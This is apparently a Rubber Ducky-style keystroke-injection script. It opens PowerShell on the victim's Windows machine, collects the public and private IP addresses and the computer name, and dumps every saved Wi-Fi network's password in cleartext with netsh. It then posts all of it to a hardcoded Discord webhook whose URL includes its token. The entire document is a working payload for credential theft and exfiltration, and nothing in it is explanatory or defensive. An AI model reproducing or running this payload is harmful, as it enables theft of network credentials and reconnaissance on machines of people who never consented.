DELAY 1000 GUI r DELAY 500 STRING powershell ENTER DELAY 1000 STRING $publicIp = (Invoke-WebRequest -Uri 'http://ifconfig.me/ip').Content.Trim(); ENTER DELAY 500 STRING $privateIps = (Get-NetIPAddress -AddressFamily IPv4 | Where-Object { $_.InterfaceAlias -ne 'Loopback' -and $_.IPAddress -notmatch '169.254.' }).IPAddress -join ", "; ENTER DELAY 500 STRING $computerName = $env:COMPUTERNAME; ENTER DELAY 500 STRING $wifiProfiles = netsh wlan show profiles | Select-String "All User Profile" | ForEach-Object { $_ -replace '.*: ', '' }; ENTER DELAY 500 STRING $wifiPasswords = @(); ENTER DELAY 500 STRING foreach ($wifiName in $wifiProfiles) { $passwordData = netsh wlan show profile name="$wifiName" key=clear; if ($passwordData) { $password = ($passwordData | Select-String "Key Content" | ForEach-Object { $_ -replace '.*Key Content\s+: ', '' }).Trim(); $wifiPasswords += [PSCustomObject]@{Name = $wifiName; Password = $password}; } }; ENTER DELAY 500 STRING $wifiPasswordsString = ""; ENTER DELAY 500 STRING foreach ($wifi in $wifiPasswords) { $wifiPasswordsString += "SSID: $($wifi.Name) Password: $($wifi.Password)`n" }; ENTER DELAY 500 STRING $message = "Hello from PowerShell!`nPublic IP: $publicIp`nPrivate IPs: $privateIps`nComputer Name: $computerName`nWi-Fi Passwords:`n$wifiPasswordsString"; ENTER DELAY 500 STRING $webhookUrl = 'https://discordapp.com/api/webhooks/1175174657285029940/mVjhnGs8YkvF7ytSvkmCNONzb3098TSe-C5PoXUwdFydx-vupSXP5zXh2_8HPDzg3KI2'; ENTER DELAY 500 STRING $payload = @{content = $message}; ENTER DELAY 500 STRING Invoke-RestMethod -Uri $webhookUrl -Method Post -Body ($payload | ConvertTo-Json) -ContentType 'application/json'; ENTER